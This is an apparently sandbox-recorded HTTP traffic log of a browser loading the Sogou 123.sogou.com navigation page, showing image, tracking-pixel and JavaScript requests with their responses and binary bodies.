GET /imgn/v32/fbg_about.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p4.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: image/png
Content-Length: 3580
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:25 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR.............&u2.....pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<
<<< skipped >>>
GET /pv.gif?uigs_productid=ufo&ufoid=ads&ptype=ads&pcode=ads&rdk=1399956570071&img=extra.gif&yyid=&ssuv=&m=&loc=&module=show&tag=62 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
Set-Cookie: SUV=0033227BC18AF4E75371A455E4AD7518; expires=Fri, 10-May-24 04:49:25 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
....
GET /pv.gif?uigs_productid=ufo&ufoid=wan&ptype=jztf2&pcode=index&rdk=1399956570103&img=pv.gif&sourcelist=0011000100006_0011000100007_0011000100008_0011000100009_0011000100010_0011000100011&titlelist=风云无åÂÅ’_仙侠é“_暗黑屠龙_Sogou傲剑2_万世_大闹天宫OL HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
Set-Cookie: SUV=00461146C18AF4E75371A4556E6A4053; expires=Fri, 10-May-24 04:49:25 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
....
GET /pv.gif?uigs_productid=daohang&rdk=1399956570493&img=pv.gif&pars=?rand=1399956570493&suid=null&sduv=1399956570462_5852_00001&ckid=6846_00001_00000_3030_00000_00000&m=null&apid=null&sgtp=null&refer=&page=&pageUrl=http%3A%2F%2F123.sogou.com%2F%3F22014&loc=null&hp=-1&pid=Af22014&ptype=index&pcode=index&yyid=null&skin=null&ver=v53_ie6_cr__4&sys=100&ser=null&sev=null&time=3531 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
Cookie: GOTO=Af22014
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:26 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
Set-Cookie: SUV=0066339EC18AF4E75371A4567C72F260; expires=Fri, 10-May-24 04:49:26 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
HTTP/1.1 200 OK..Server: nginx..Date: Tue, 13 May 2014 04:49:26 GMT..Content-Type: text/xml..Content-Length: 0..Connection: keep-alive..Set-Cookie: SUV=0066339EC18AF4E75371A4567C72F260; expires=Fri, 10-May-24 04:49:26 GMT; domain=.sogou.com; path=/..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"......
GET /pv.gif?uigs_productid=ufo&ufoid=daohang&ptype=indexv53&pcode=index&rdk=1399956575900&refer=&page=æÂœç‹—网å€导航ï¼Âï¼Â网å€大全,实çâ€Â¨Ã§Â½â€˜Ã¥Â€,尽在123.sogou.com&pageUrl=http://123.sogou.com/?22014&img=pv.gif&vcode=v53 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
Cookie: GOTO=Af22014; SUV=00DD04B9C18AF4E75371A458B1D10495
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:30 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx..Date: Tue, 13 May 2014 04:49:30 GMT..Content-Type: text/xml..Content-Length: 0..Connection: keep-alive..
GET /imgu/2014/05/20140507144656_823.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p9.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/jpeg
Content-Length: 5785
Last-Modified: Wed, 07 May 2014 06:46:56 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
......JFIF.............0Exif..II*.......1...............VVV.meitu.com....C....................................................................C.......................................................................=._...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....n.aw..W.....8m...K..`.v.w..!.....g..p...fu.I@.>-....l..T....N..8..X8...ji~%.......... U.`........F...{_........~2.c....U...V7.:..6o....?.....*xy3..IU.B>g......?...o..l.LQ...<.".Lo"KS,..-...QT..d..W.R.1..T....U.r.E..........S..K_...u~..?........m..KTP1sf....y..N.s....._QE..j.5....qU.h{......|#..}.... ....8...u..]F;..b.XQ...h..M9.........................j...M.4RL..{.Y.u.O<WR.i9sJ-G......~X......W.-..g..o...X...q.V..Gc._O.IJ......qj.OMD.....%....F....T..... ;.xB......L.4g.b.r.K..... ..#...X..6. .W...*.GE.s.0.f..b.&..F.e.A........y..4.GZ.....R..<Q.O.H..?.4.R...2.....U..rB.*.fb#Bs..p...8...........{Y.QS7..j......K..o^.......D...%.......`....N..@....6.L..F9.*X.V......'0.C.Y........n.C....%.........b.SN,t..]>..}.^..<...?.|....(....}'..P..&......_......^.V....'....4..J..6..q.B.{....<.&...}6a...^.............q|/..<m.?....[.......
<<
<<< skipped >>>
GET /imgn/v32/skin3.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p0.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: image/gif
Content-Length: 4159
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:25 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a..h..........R..J..Bs.S................r.....qq}a.......................n..~..|..m..l..l..x..k..v..t..i..s.xa..n..l..k.ua..i..h..i.~f.r`....wd.xd....rb....pa.nb.rf.vm.xp.xp}OJ..........l`.mb.pe.od.oe.wl.xn.qg.~t.sj.sj.tk..|..}....SM.vn............wMIuLH.|v.}wmJG.......~yeHE..|..................................................................H??.................................................................................................................................................................................................................................|||{{{zzzyyyxxxtttsssrrrpppmmmlllkkkjjj<<<..................................................................................................................................................................!.......,......h........H......*\.......H.H.....3j.....I.BJ......(S.\.....0].IdI.$K...T...O.....JTh.dH.*EZ..O....%j....J.@1.....{.@.9.R.=;..].VA.8p..ms....x.5m../..;8.......u.........#[...N!F.......g....&L.`2....T.....;vd.L8L./..g.......)..s.....]..=P......F}W.@..)....v\4=bs..}w...J|._.>.r...?..].t.......B..)T.].n....g....B.&....'!d....2.=W.2.Q..2.Y`...x....\(..I.....1.....`...L...s|...@R.......|p...].2.Bl L...#8...l<.[.e..C.o.W..6.&..2.....E....U....).ZS!....".p....%F.;....G...QZ....5.@..L.........s...^..........H..D....C.....Bu.bj ......b..d.......l.k...0F......8|Z...R.k.........A.sf...u6...wN[m.;9..TS.u.VJ5..O..k.i.......$...............p..G,....j...g....w... ..q...l..(..r.$_.qM .4.'1..J.6..r.pb<J*..<.-.............I.<
<<
<<< skipped >>>
GET /imgu/2014/05/20140512112800_851.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p0.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/jpeg
Content-Length: 18313
Last-Modified: Mon, 12 May 2014 03:28:00 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.....0Exif..MM.*.......1..............VVV.meitu.com....C....................................................................C.......................................................................k._...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......8.:.da....0N......<.3.F....J;.E~.;.u...1.._?.....s.c%..d....4k.H...T2.Y.>TG..d....q..<.W. ..5h.h.h......o...i.[......v..k..>........:...]i...um.....G..R........P.k.iZ......y.......\.n..sZ....Ws..F.X.q.p...w..]g;.....(...]..W...\-H.....c..........Z...*5..R. S.:......M........4K]?V.....].Y.x.V..x"....Vw..k...N.%.../6E..rd.i'._..e..........^..~..-.d.. .,!..b.]Y..u.G2...P.:8OiR8.=J..*.W6..s.:q.Q.J._g.Rw.b.c....'.z.}.g..........~..g...G.....[....=.v..6...$:..oq.xYt....M..........i.Z..-.m_.q...........F..R.[.S..Z.%e..QB.o...*IE)9..x.......j..p..*4*EFMS..R..(.{:...q.p..(.1..C._.......<3.GJ..!.?.....K.l....^>'..4..L...R=i.....v.m..h....N..]..&.o.....NN......Q...Q.8F..T..j8.J>..]')..R^..b.<d=.'..Z1...qT........j........R.j. .'...[......!.6~..?.>.k?o.....>(.aZ.h...u=KA.Dy..ck.j.....V:......Y.....K5.........4.H..%/f..7z5.%...$....a<\...l....
<<
<<< skipped >>>
GET /imgn/v32/setskinbg.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p3.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:26 GMT
Content-Type: image/gif
Content-Length: 397
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:26 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a.......................................................................................................!.......,............%.di.Y..l.bp,.tl.x..x.....G)....q.l:...dJ.Z...v..z...xL.....z.n....|N.....~............................\...........................................................................................................H......:X......#Jd......3j...".. C..I....(G.FX.....,C..;
GET /imgn/sehome/tjv1/new-ico.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p3.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/png
Content-Length: 211
Last-Modified: Mon, 28 Jan 2013 11:52:04 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR.............&P......sBIT.....O.....PLTE...???.Mv.....tRNS..[.".....pHYs.........B.4.....tEXtCreation Time.12/28/12...5....tEXtSoftware.Adobe FireworksO..N....IDAT..c` .H..!...2.1_.......IEND.B`.....
GET /imgn/v51/i-ico-2b.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p3.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/png
Content-Length: 2337
Last-Modified: Thu, 30 May 2013 07:28:54 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR..._...X......I M....sBIT....|.d.....pHYs.........B.4.....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.12/28/12...5...}IDATx...{l[...?..y4MH.'$kIXJIE.H.^K.2...d06p.44.m.4..tb....m...ib..aM.....Tk......#{....P......m.&n..}}...ul...~..J.G..{..]..=?...>...HlA.......F..6"...K....^lG.#.#_6@..)...(.9.|...#g..E9...,Gr._._\,././>.rm.6.$.F..6"...)..H.m..........,G2.5[...w...0.. .UX..pi.....O...;%.sI.V..?~.}.e.#3.Q}..B..W.L..I}..}....4.4..{..k73....5"_.A.h(..PH..<J..O(.vv.a*.c.n..5.H.5.. ..U.m5.e8.....r....._.....A.5.._.s...eJHc.c.%uv..@|..^!....0.XC.|:\Y2G."..............F..&.-._......T.qel.4...~r...o......$..gI. ..=.K*S/...v.\./......o...~..jv...n)|.d=.R......:.....(.3=...C)|..g.lD.j..........y......-..p...,.C_....Y......P.....;...:p...@{.~..u...[3Up..M........&...V.Y:..N..`66.......,.....J.....'R......6.........)....c..K.../..........)..s[.r.h...)N.U .......F9=.d..*>...l.q.}....A....0....../V......3.wy|..........q:.....s.w.'.r. .C..wh|...K...g...e...3.H...].<......].Iu.....x...f..{......7"......;...........k...`=..D.:.7.fu.....T......`r:...Yy.... .1....a^...o......A.cJL......}.4c...oIT.9...!........k.....U....a&....H..]D....@..........63...$.....R'.}.#._N)....8.|..L..<pON9....F.....j*....`|j.....y].........h..p'..y...O.....$.X........~......S....:.yF~"o.7.$x"......2..Ss~.t....B.......l.&.[....s$..4.#....W.....ho^..........T.c.K ....&./"..)../.}...h..!^ "u.r..j....G....E./Mg...$..LF; .>_.......9.~DZ1..<.<gb.......6...e..3..TA....-.F.>..==.....o.p......J.<..nG.%.
<<
<<< skipped >>>
GET /imgu/2013/05/20130531144119_126.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p2.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/png
Content-Length: 13613
Last-Modified: Fri, 31 May 2013 06:41:19 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR.......2.............pHYs................MiCCPPhotoshop ICC profile..x..SwX...>..e.VB....l.."#....Y....a...@....V....HU....H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0..>.3.o..~..@...z..q.@......qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N....l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A..............a.D@.$.<.B........A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R...J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6..l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......)..k.f....t...,.......9..k.a........E..J.6.....|...M....V>VyV.V
<<
<<< skipped >>>
GET /imgu/2014/05/20140507144124_693.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p2.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/jpeg
Content-Length: 5054
Last-Modified: Wed, 07 May 2014 06:41:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
......JFIF.....`.`.....0Exif..II*.......1...............VVV.meitu.com....C....................................................................C.......................................................................=._...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...h..O>..y0...Dq...(....z..QWl..9Y......g.Ry...Z..k...ib.......6....?......1/.2...#x.....~...........k ........u![.w.2.......`.....5.........q..|e...<....g.4....R[m.W....V.Gp`..F.~lg.R.J.eI.'....%..H.M7..{t...D.......q%.[..u%\..I......e..a.....yP...]H...F..6.L..6......{...)G@.9sY...F.].>....%............OS..`.p..y.%.iO.Z.NJQrg.y.....O...2.\..V{{....B..?J.p....4..p...0..........x.\.....#.Wr....Uj.....@.[...8...W..B1.s....u.G._..?....]...).k....6|M._..3.z...U.A.iZM.............1...k.....?...(o..?.....MP|..E..|..I-....>[.....c.$~.< 8...4.j.2..%.~....J....z..3..................W.....~..H#s...L...8A.*.....WC......\..Z...5..f..,.......U...N.\e.Q-..3\$...y8?qB..n0y.1\=.J......kO....n:.T\...g.......0.?i/.E....!.|C>..zF...m..L........z.28...b*V.UwZhz..P.U(..>.._...|F.....|1...e..{-J.f....#.../s...X.....#.&..i..x/...l..#K.......Y.kg.HUWr.T.
<<
<<< skipped >>>
GET /jsn/citydata.js HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; GOTO=Af22014
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 19 Sep 2012 10:54:17 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
5c2b............m.Yo[I...W.t..o{......'7............-.[.Z6EJ.G..(R.G....gK...(w..~-.g..._:....U.j..U.V.........._....o....?.........?.s...........s.......wZ......4Y^..K....>..e.n.nv.[@..v..<.o.].S....>.....]d...4..LU]...7S..9...d.z.2........*..U..T..x~.y.&.!.3...x......y....y....%.Y.W........S.s.yv. ,.2.,.M..7..k9=..|....WT..........>g.......7..M>'..F..~_......~_...Q.>.3.Lssk.....M.....b......q5......Bx.6.c0......{........z...T./...-...........2.,<..(..pExy>..U....x..)..In..0.Q8;.P...*.........q.Y.........X..=...Y_9..bl.w?m.16........~....xw.l\....~..L7.{...l.6C..v.`M....n..%..F......O.~......Y....fl...R....O....f..P.........'........ly%...\.L...9..\..a..=.V.....u3...........W.......f.Fm..B:....?.?T..q........m.].LFj....~..Lwq..C......M.Y..6.K......T.....FT..l..P....m....n...}..fl.r.b....5...XQtGT..).h.bG..\ao....tg.m...@w.....ql.2.#..xffA]...v......I)/\...v'....:..........q....Z..)...Z.rK..8.zV.F.....n.....r&;..n.q.......6...H..i=.-.&.5.Msu..,.........b...r..KY9.......J...Q.8.....bl..P...s.<.|...n......5..G.j.....9.k,..R.e.%k...0..L.%....5.E...g.].1.y..G........H........a/..-U.,6k.< .b......U.#.k.....#...<...........z.*.w.........-.z.V.............v.m....%z...m..,......h..6..7...../.h..6....k..:JV.z.R.....0.@.....KA..5Y....#=hH6p..,..........CLo~r.Fl~F_..TT.....P...G..&.~...i.z......M:a....;..r..~3b..... .......}.g.\c...AL..L.l..w..]...9...].=j=........X.2|alV....W........[b..zyc.Z... .......K2...\..X-..........0.D0~50^..*]........l..Y...f{..<$`K8.8Q..........l.....[.(O.}5..
<<
<<< skipped >>>
GET /v53/imgn/v53_bicos.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/gif
Content-Length: 826
Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT
Connection: keep-alive
Accept-Ranges: bytes
GIF89aD.......Bo...v..1..;o..........f...W.......;........e...W.d..............@......`..P~%s.......@..G.....O..j......g.r......L{......Z......W.%h.t...d................@..&z..Hv......L...\.Q~..R....6............h..Ky...y..Y..Cp..a...........R.....Z.....Cr.c..........:......o.......$m..f....&}.......................................................................................................!....._.,....D......._..............@'K3@?...0 0...''@...'....0......KK.3$.;=3........'*K??G..CCH8........?'/E.?6.&.LZ..........@3.2.E&&LLN.T@@.. .. .mXR.....7(a. ...4>.[.c@..-..X.)...?.n..e...4P...H...R.H......P........4..dY...'..f..d@.D..D......?F)..!....BX...A......1.^.... u@..,!_9..{.c@0D.....0J....tHr..]A.~..7`....N......!J...pb..AF.L....._O..;....!]..#2...AF.H.. .4#.~D.b%.....,.... .h..p.DP.W.......o..><0.K..{.O.@Q .;t>....
GET /v53/imgn/foot_slider.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:24 GMT
Content-Type: image/jpeg
Content-Length: 322
Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT
Connection: keep-alive
Accept-Ranges: bytes
......JFIF.....H.H.....C....................................................... ...C................ ........................................................................S.........................................................?......>....('@......... . ..@....
GET /v53/jsn/main.js?V=16bb90f6b3db269d3b0dadfb85d67a51a HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:28 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 12 Feb 2014 04:41:53 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
54c0..............{[.G...w.... Y-!q.....0...${..I^`xuiI.BR....:.......H.;.......?.....Z.n.j....p}=..L.....8.u....h.O....;a7....x..X..D...]z.@..O..@..S..0..i.9...|^....8......X.........!_G......a....\.W....9..P.O..$.'..^..~H7.....Gww.0~./...2.e..,.....*H>.. f_}... Z^..f.U.d....b.....C?..............LJx.....~4 .!...x6.._?,.....<.LC..(......I..&..$m4l...'......a[0.d2i~J.n...I.V..........a.\z....bx1....va...[7a.6....v..aj..!...j-..D<..V?...~T.#....e)tfw.....R.......>.eh [s....(..g.w../g.N../g.{.v.g;.........W{........r......~...{a.#.....V8)....&a..@k....j9.>......y>{.M..]..tkoN.K.n|....z...........]..v..........-z.z..-............`.kj.9;..H.N......~.L .o. O.7.hXd@9X..zv....{vN..N.........m._.....qv...`.A..p<h.....;........ 